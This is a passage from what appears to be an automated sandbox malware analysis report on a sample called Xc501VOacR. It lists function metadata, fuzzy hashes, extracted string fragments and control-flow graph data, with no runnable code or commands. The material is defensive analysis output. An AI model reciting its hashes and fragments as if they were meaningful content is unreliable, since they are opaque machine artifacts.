                                • Instruction Fuzzy Hash: CA4116B4E1520EDFDB08CFAAC4805AEFBB2AF99314F24D46AC415E7215E3349A41CF94
                                Function 078C11C8 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: A{]z$}\%G
                                • API String ID: 0-4271377017
                                • Opcode ID: 6fb3b0b4635e06ec614fcbc42b1e08e9156e778a4b742a6a49d8803245ba19d8
                                • Instruction ID: 8f311c817b4d4b19166b71c6022324897c1e05af84a0d5cbe6ce352bad72a167
                                • Opcode Fuzzy Hash: 6fb3b0b4635e06ec614fcbc42b1e08e9156e778a4b742a6a49d8803245ba19d8
                                • Instruction Fuzzy Hash: EE41D5B4E1420EDFDB08CFAAC4845AEFBF2AB99314F24D42AC415F7255E7349A418F94
                                Function 07472F80 Relevance: 2.1, Strings: 1, Instructions: 805COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: F
                                • API String ID: 0-2945319695
                                • Opcode ID: 3b2a1fa0ade3e17239480b7e2d743acbd7790d90cdc3a1f5fb3a6c160f209682
                                • Instruction ID: fbf485c17235320b38aa66dbcf52efe6d771c3ec481d691e0979f9413591870e
                                • Opcode Fuzzy Hash: 3b2a1fa0ade3e17239480b7e2d743acbd7790d90cdc3a1f5fb3a6c160f209682
                                • Instruction Fuzzy Hash: 7762FF71E143158FC715EFB8C89469DBBF2EF8A204F4585AAD049EB350DE389C46CB92
                                Function 078C0B20 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: yS^Z
                                • API String ID: 0-4128205011
                                • Opcode ID: e4bc18a5b258e20db0e0ddeb91dfcd75e123f38b81dffe779946a17a2f5fd691
                                • Instruction ID: b3d6c2a7a4654d792c03cf02f20e0b3e8a25fd3b25b3dcae81685a3bdf18bc6e
                                • Opcode Fuzzy Hash: e4bc18a5b258e20db0e0ddeb91dfcd75e123f38b81dffe779946a17a2f5fd691
                                • Instruction Fuzzy Hash: BF71FFB4E1021ADFCB44CFA9C9809AEFBB2FF99354F14851AD515AB214C730E982CF95
                                Function 078C0B10 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: yS^Z
                                • API String ID: 0-4128205011
                                • Opcode ID: e7a0fca25e41c19c6dbed19a2f9145d51bcec7a34726daf028dd23989ddc8205
                                • Instruction ID: e9f5a32d88f66bce4927d6fda4237781d9db67cc98e27da8ab215b1a57ebe91e
                                • Opcode Fuzzy Hash: e7a0fca25e41c19c6dbed19a2f9145d51bcec7a34726daf028dd23989ddc8205
                                • Instruction Fuzzy Hash: 4B6111B4E1021ACFCB04CFA9C8809AEFBB2BF99354F14855AD415E7314C730EA828F94
                                Function 01250A78 Relevance: .4, Instructions: 367COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2692986570.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be72dbe528d531d730962ff5f944d450bb147743a3ac8f3a64f19601d81b08cf
                                • Instruction ID: c45a29cb5d2094d7bc765a3a977ce73f5663207179b6b49c88636d5ffdef4824
                                • Opcode Fuzzy Hash: be72dbe528d531d730962ff5f944d450bb147743a3ac8f3a64f19601d81b08cf
                                • Instruction Fuzzy Hash: EDD1AE327117018FE759DB79C890BAE7BE6AF89700F14446DEA46CB291DF35E801CB91
                                Function 07E4EBF0 Relevance: .3, Instructions: 322COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8735016d722858e88bf5351a5910c233249cf8e71e287bb2064c5c4d5626b201
                                • Instruction ID: 869c6b6faca01f18d0ff9a5a2774e23a6d701e35a107c4e297510ba15c95c79a
                                • Opcode Fuzzy Hash: 8735016d722858e88bf5351a5910c233249cf8e71e287bb2064c5c4d5626b201
                                • Instruction Fuzzy Hash: 8DA1E370B002555FDB58ABB9845437F3AABAFC8710F2485AD940ADB798CE389C03C795
                                Function 0535F3E0 Relevance: .3, Instructions: 315COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52b8824557d266b28537b3a322a5e1728a0527b80430e0dc88ec6ea3feeb1bbd
                                • Instruction ID: 6a5a877c44e6b0c0047aed7096e84ef79d19ed4d49726217a3dea94fa5bd2a42
                                • Opcode Fuzzy Hash: 52b8824557d266b28537b3a322a5e1728a0527b80430e0dc88ec6ea3feeb1bbd
                                • Instruction Fuzzy Hash: 371291F0422B468AE3109FA5F94E1A93FB3FF44338B54420AE2611A2D5DFB9115BDF64
                                Function 08250006 Relevance: .3, Instructions: 288COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e012f1a8060e7c2bc6ea9d47a746f5d921a04fae99129430dcf57b1ad25aff94
                                • Instruction ID: 626b65da413b106297b329b2cd74c632746fad75d0cdd60133cc94a4cfd1f946
                                • Opcode Fuzzy Hash: e012f1a8060e7c2bc6ea9d47a746f5d921a04fae99129430dcf57b1ad25aff94
                                • Instruction Fuzzy Hash: D9E15A31C2075A8ECB01EB64D994A9DB7B1FF96300F25C79AE04977221EF706AC9CB51
                                Function 08250040 Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3965a9fc5f19680e357750dfce414667b0c6c8438727418d16e0fdb0f129fb2b
                                • Instruction ID: a41cf2fea8da5c2706c94255cf35881cf0bd5a7643b048f65f9812a33bd8d454
                                • Opcode Fuzzy Hash: 3965a9fc5f19680e357750dfce414667b0c6c8438727418d16e0fdb0f129fb2b
                                • Instruction Fuzzy Hash: AED11935C2065A8ACB11EB64D994A9DF7B1FFE5300F21C79AE00937224EF706AC8CB51
                                Function 078C9DB0 Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3472e9f2890162662576ff427a67f5e7cfaf42fe14f341d9879847522f5001fb
                                • Instruction ID: 032e924469299e7cec43af530adeb90f6a8662e4f65c0e822bd916684f4d0e86
                                • Opcode Fuzzy Hash: 3472e9f2890162662576ff427a67f5e7cfaf42fe14f341d9879847522f5001fb
                                • Instruction Fuzzy Hash: 3CB113B0E1521DCFDF08CFA5D9446ADFBB6FB9A304F20952AD40AEB254D734A9018F15
                                Function 0535D5EC Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e73cb36d2761c4cdfb98cc84216fffe82d46f0e5066ca64d4e9fa9c09c371130
                                • Instruction ID: bc023f315e510c7f6437ee2435604fa1fee2fda162199ab05a19f97cfb27ebfd
                                • Opcode Fuzzy Hash: e73cb36d2761c4cdfb98cc84216fffe82d46f0e5066ca64d4e9fa9c09c371130
                                • Instruction Fuzzy Hash: 82A19232E10219CFCF05DFB4D44499EBBB6FF85310B1555AAEC06AB261DB71EA46CB80
                                Function 0535F3D1 Relevance: .2, Instructions: 220COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26f5ce3112ce9d33b22bb68f9f6137d4a85bff1edbcfa235594a3f0d002f9d4e
                                • Instruction ID: 0810b21fb093c53659ff4068daf41a5a50fffdc3ab720688567342da21406f1a
                                • Opcode Fuzzy Hash: 26f5ce3112ce9d33b22bb68f9f6137d4a85bff1edbcfa235594a3f0d002f9d4e
                                • Instruction Fuzzy Hash: 74C1E5B0422A468AE710DFA4F84E1A97FB3FF45334B14421AE2612B2D5DFB8144BDF54
                                Function 078CA518 Relevance: .2, Instructions: 215COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ac21242dd5be5836c5ed8470280df3402f625cf5e7660987f1f1d0e46c9f48a
                                • Instruction ID: ede0620d2f863cd763db01d37d3220fdbef6b74352e142ac7b345390642f0e41
                                • Opcode Fuzzy Hash: 1ac21242dd5be5836c5ed8470280df3402f625cf5e7660987f1f1d0e46c9f48a
                                • Instruction Fuzzy Hash: BDA12AB0E111199FDB14CFA9C980AAEFBB2FF89301F24C2A9D419A7355D7319A41CF61
                                Function 078C0007 Relevance: .2, Instructions: 193COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d89303eaced56b786362d025f30f441a16a96944798cf6315b7c641879e4a1d
                                • Instruction ID: f9216bc5b356914565055a9cfb673463f8a792286d55d822b2c63871f8dcf476
                                • Opcode Fuzzy Hash: 6d89303eaced56b786362d025f30f441a16a96944798cf6315b7c641879e4a1d
                                • Instruction Fuzzy Hash: CF816574E15249DFCB08CFA9D88099EFBF2FF8A250F1485AAE414EB225D7309A41CF51
                                Function 078C8BB8 Relevance: .2, Instructions: 180COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f2f0055e27ed74013ca9e342e37bd4cbd22c3f7f9b6a50c27bdbbe2e48a49660
                                • Instruction ID: 2ab1486df8be6a7f99219e684e1bfe664e10be7901cb94f4fb6d6c44cfd01161
                                • Opcode Fuzzy Hash: f2f0055e27ed74013ca9e342e37bd4cbd22c3f7f9b6a50c27bdbbe2e48a49660
                                • Instruction Fuzzy Hash: 418127B0E112198FDB54CFA9D980A9EBBB2FF89304F24C1AAD419E7355D730AA41CF50
                                Function 078C8BA8 Relevance: .2, Instructions: 178COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bcd4b1ac3eeda0b896e9b2aeaf29f7b6fefe883847a518995222f0764db01dc3
                                • Instruction ID: acd3b07595df36cb0bbe351ea3f1399a5ed6dfe17d98d6aa23b43462c655a865
                                • Opcode Fuzzy Hash: bcd4b1ac3eeda0b896e9b2aeaf29f7b6fefe883847a518995222f0764db01dc3
                                • Instruction Fuzzy Hash: 1C711AB0E112198FDB54CF69C980A9EBBB2FF89301F64C1AAD409E7355D7349A41CF61
                                Function 078C0040 Relevance: .2, Instructions: 174COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a35959bff136d20d73d456ef45ea865a943b7dbdd66b05f8361e3bec216ae532
                                • Instruction ID: 7e6c30ebec63ee0ff9bdefa4fddf220fa9ad34d0a66137601652f7aead6c5f9d
                                • Opcode Fuzzy Hash: a35959bff136d20d73d456ef45ea865a943b7dbdd66b05f8361e3bec216ae532
                                • Instruction Fuzzy Hash: 9571D274E15209DFCB48CFA9D88499EFBF2FB89250F15856AE418EB224D730EA41CF51
                                Function 078C5B68 Relevance: .1, Instructions: 129COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e9404d21a7d9ecd06f31cfc05413f74ae7dafb43cd3ba6ef92a251bbe6d4d69
                                • Instruction ID: b2b41d9bc3c17e7d6a30748f6eaeaccc49a2a0641e26a1e9f64319609e0ae580
                                • Opcode Fuzzy Hash: 3e9404d21a7d9ecd06f31cfc05413f74ae7dafb43cd3ba6ef92a251bbe6d4d69
                                • Instruction Fuzzy Hash: A4513CB0E111198FDB14DFAAD9806AEFBB2FF89305F24C16AD419E7245D730AA41CF61
                                Function 078C5B58 Relevance: .1, Instructions: 125COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 225915b3c5cbb39aee147f8d38d7db76e125c438d9db66285561aa20dda8fe3e
                                • Instruction ID: 4de6841e7be388b7e1af62f345f79d8877bfd001bdd0b43df793f052597c2fae
                                • Opcode Fuzzy Hash: 225915b3c5cbb39aee147f8d38d7db76e125c438d9db66285561aa20dda8fe3e
                                • Instruction Fuzzy Hash: D5513CB0E111198FDB14CFA9D9805AEFBB2FF89301F24C56AD419A7255DB30AA41CF61
                                Function 078C23D0 Relevance: .1, Instructions: 114COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8cf2b867a5343933550946d91b6be6e74175d92aec087ad8f003d0558859c958
                                • Instruction ID: 9f9f390e89635bce0c8d6832ad0d32a22dc616f9e46e5669548d25b1a68bd87a
                                • Opcode Fuzzy Hash: 8cf2b867a5343933550946d91b6be6e74175d92aec087ad8f003d0558859c958
                                • Instruction Fuzzy Hash: 9A514AB1E116188BEB58CF6B9D4479EFAF3AFC8300F14C1BA850CA6255EB345A858F11
                                Function 078C23CF Relevance: .1, Instructions: 104COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 544af22cb91564f8fc45ceba153b74267e05b19b9b67e03a9559cdab4d0589bc
                                • Instruction ID: 3e7456b91309acea8ee21b288802b64a7f11b80caeb45a28f3b56932ab9f42b7
                                • Opcode Fuzzy Hash: 544af22cb91564f8fc45ceba153b74267e05b19b9b67e03a9559cdab4d0589bc
                                • Instruction Fuzzy Hash: 8F412AB1E016588BEB58CF6B9D4479EFAF3AFC8300F14C1BA850CA6265DB3409858F11
                                Function 078C1668 Relevance: .1, Instructions: 100COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 312d789f7717ed47bea6365f93f3d7a20c71aec3c8b98cfa776586db76a1515d
                                • Instruction ID: 6665eb80d1b4662c52d495cba6b5bae3bd48dd162f29a8f33383e5a69552a5fd
                                • Opcode Fuzzy Hash: 312d789f7717ed47bea6365f93f3d7a20c71aec3c8b98cfa776586db76a1515d
                                • Instruction Fuzzy Hash: E641E4B4E0520E9FDB04CFAAC5855AEFBF2EF89310F24C16AC405E7215E7349A518F95
                                Function 078C1678 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6494f94f3c1e3e5f96bf84ab120b689ac5532957b5009e14986f379d5ff278c0
                                • Instruction ID: 4eb971c8b4e21fd7f5ff654b1ce51547ff6558a1e9f65c2c89acaa1651b58222
                                • Opcode Fuzzy Hash: 6494f94f3c1e3e5f96bf84ab120b689ac5532957b5009e14986f379d5ff278c0
                                • Instruction Fuzzy Hash: 7041D4B0E0520EDFCB04CFAAC5855AEFBB2AF99300F24C569C405A7215D7349A418F95
                                Function 06013857 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d56b3ea4e1c8a859b01ea6e2b4b89021aed5c7fbfefa95985c45230d15c7a3aa
                                • Instruction ID: 3a94e6d1b25d622bc91b3fb0af51d9b04425488d19333d348b04b186dfb585c5
                                • Opcode Fuzzy Hash: d56b3ea4e1c8a859b01ea6e2b4b89021aed5c7fbfefa95985c45230d15c7a3aa
                                • Instruction Fuzzy Hash: 0021D67245A3829FC752DF74D8149827FF59F6B33036848ADD8C0CF052E6654856DB51
                                Function 078C1810 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89d66a2baf8b8e9e54519a91135b4a6e23b06c7d716bab905a8785229bc6c3ea
                                • Instruction ID: bb7463dd6f041c98c009686b662bf7986f9958665021a226e25478abc049ade9
                                • Opcode Fuzzy Hash: 89d66a2baf8b8e9e54519a91135b4a6e23b06c7d716bab905a8785229bc6c3ea
                                • Instruction Fuzzy Hash: 2511FCB1E016188BEB48CF6B98446DEFBF3EFC9200F14C17AC808A6265DB3405568F51
                                Function 02CD7CE0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: \;]q$\;]q$\;]q$\;]q
                                • API String ID: 0-2351511683
                                • Opcode ID: ed219d215c6015f5088aea66c453cd732a7374ea717c7b6548bc09463a277ee5
                                • Instruction ID: 068597aad3cfb53ea21cb94a814f2701f09c689b1d61b401c128cbe487b8e2a5
                                • Opcode Fuzzy Hash: ed219d215c6015f5088aea66c453cd732a7374ea717c7b6548bc09463a277ee5
                                • Instruction Fuzzy Hash: A9018F717401198FC7688E2DC484A36B7EAEFC9A60725456AEA05CB3F0EB31DC45C790

                                Execution Graph

                                Execution Coverage:10.7%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:21
                                Total number of Limit Nodes:4
                                execution_graph 36238 109c1c0 36239 109c1d9 36238->36239 36240 109c1a7 36239->36240 36241 109c23c DuplicateHandle 36239->36241 36242 109c256 36241->36242 36243 1097e30 36244 1097e35 36243->36244 36245 1097e53 36244->36245 36247 10990a1 36244->36247 36248 10990ab 36247->36248 36249 1099185 36248->36249 36252 66d33a8 36248->36252 36257 66d33b8 36248->36257 36249->36244 36253 66d33cd 36252->36253 36254 66d3614 36253->36254 36255 66d3a48 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36253->36255 36256 66d3a38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36253->36256 36254->36249 36255->36253 36256->36253 36258 66d33cd 36257->36258 36259 66d3614 36258->36259 36260 66d3a48 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36258->36260 36261 66d3a38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36258->36261 36259->36249 36260->36258 36261->36258

                                Executed Functions

                                Function 067564F8 Relevance: 27.9, Strings: 21, Instructions: 1646COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: X\-$'e\-$.Z\-$5X\-$<[\-$?e\-$@[\-$Nj\-$SZ\-$YX\-$[[\-$zZ\-$ze\-$$]q$$]q$$]q$$]q$$]q$X\-$Z\-$j\-
                                • API String ID: 0-3537301711
                                • Opcode ID: d639fe4f18f3c679d0db13b95e0551c5549444b1f3f9472e4b367829e8fd25ae
                                • Instruction ID: d63b67d9a25ef20beea6c40acd6ac5b6c2ba921af7d102130d3751b07832dde2
                                • Opcode Fuzzy Hash: d639fe4f18f3c679d0db13b95e0551c5549444b1f3f9472e4b367829e8fd25ae
                                • Instruction Fuzzy Hash: CAE26B30E002198FDB64DB68C894AADB7F2FF85310F5585A9D809AB365EB70ED85CF41
                                Function 0675C410 Relevance: 9.3, Strings: 7, Instructions: 512COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1848 675c410-675c42e 1849 675c430-675c433 1848->1849 1850 675c435-675c443 1849->1850 1851 675c44e-675c451 1849->1851 1859 675c449 1850->1859 1860 675c4c8-675c4de 1850->1860 1852 675c453-675c45d 1851->1852 1853 675c45e-675c461 1851->1853 1855 675c490-675c493 1853->1855 1856 675c463-675c48b 1853->1856 1857 675c495-675c4b1 1855->1857 1858 675c4b6-675c4b8 1855->1858 1856->1855 1857->1858 1861 675c4bf-675c4c2 1858->1861 1862 675c4ba 1858->1862 1859->1851 1867 675c4e4-675c4ed 1860->1867 1868 675c70f-675c719 1860->1868 1861->1849 1861->1860 1862->1861 1870 675c4f3-675c518 1867->1870 1871 675c71a-675c74f 1867->1871 1888 675c6fc-675c709 1870->1888 1889 675c51e-675c54e 1870->1889 1876 675c751-675c754 1871->1876 1878 675c9bc-675c9bf 1876->1878 1879 675c75a-675c769 1876->1879 1880 675c9c1-675c9dd 1878->1880 1881 675c9e2-675c9e5 1878->1881 1891 675c788-675c7cc 1879->1891 1892 675c76b-675c786 1879->1892 1880->1881 1882 675caab-675caad 1881->1882 1883 675c9eb-675ca10 1881->1883 1886 675cab4-675cab7 1882->1886 1887 675caaf 1882->1887 1910 675ca17-675ca19 1883->1910 1886->1876 1893 675cabd-675cac6 1886->1893 1887->1886 1888->1867 1888->1868 1889->1888 1911 675c554-675c55d 1889->1911 1900 675c990-675c9a5 1891->1900 1901 675c7d2-675c7e3 1891->1901 1892->1891 1900->1878 1907 675c7e9-675c80c 1901->1907 1908 675c97b-675c98a 1901->1908 1907->1908 1928 675c812-675c935 1907->1928 1908->1900 1908->1901 1913 675ca31-675ca35 1910->1913 1914 675ca1b-675ca21 1910->1914 1911->1871 1916 675c563-675c585 1911->1916 1919 675ca37-675ca41 1913->1919 1920 675ca43 1913->1920 1917 675ca25-675ca27 1914->1917 1918 675ca23 1914->1918 1929 675c58b-675c5b3 1916->1929 1930 675c6ea-675c6f6 1916->1930 1917->1913 1918->1913 1921 675ca48-675ca4a 1919->1921 1920->1921 1924 675ca4c-675ca4f 1921->1924 1925 675ca5b-675ca9a 1921->1925 1924->1893 1925->1879 1947 675caa0-675caaa 1925->1947 1994 675c937-675c941 1928->1994 1995 675c943 1928->1995 1941 675c6e0-675c6e5 1929->1941 1942 675c5b9-675c5e1 1929->1942 1930->1888 1930->1911 1941->1930 1942->1941 1951 675c5e7-675c615 1942->1951 1951->1941 1956 675c61b-675c625 1951->1956 1956->1941 1958 675c62b-675c665 1956->1958 1967 675c667-675c66b 1958->1967 1968 675c670-675c68c 1958->1968 1967->1941 1971 675c66d 1967->1971 1968->1930 1969 675c68e-675c6de 1968->1969 1969->1930 1971->1968 1996 675c948-675c94a 1994->1996 1995->1996 1996->1908 1997 675c94c-675c951 1996->1997 1998 675c953-675c95d 1997->1998 1999 675c95f 1997->1999 2000 675c964-675c966 1998->2000 1999->2000 2000->1908 2001 675c968-675c974 2000->2001 2001->1908
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ls\-$Ss\-$ms\-$|s\-$$]q$$]q$r\-
                                • API String ID: 0-2238049251
                                • Opcode ID: ea7a9dc76aac6ceb3eec50941cf559e831951b68327583eac3a01ef6c3c0b210
                                • Instruction ID: 7145508a5f6282f6fdea8ccab84a061d6bcad7c0f49fd3ebdf74e72c5939482f
                                • Opcode Fuzzy Hash: ea7a9dc76aac6ceb3eec50941cf559e831951b68327583eac3a01ef6c3c0b210
                                • Instruction Fuzzy Hash: CC02CC30B0020A9FDB59DBB8D4907AEB7E2EF84254F15C469D80AEB395DBB4DC46C781
                                Function 06750040 Relevance: 2.8, Instructions: 2828COMMON
                                Download Yara Rule
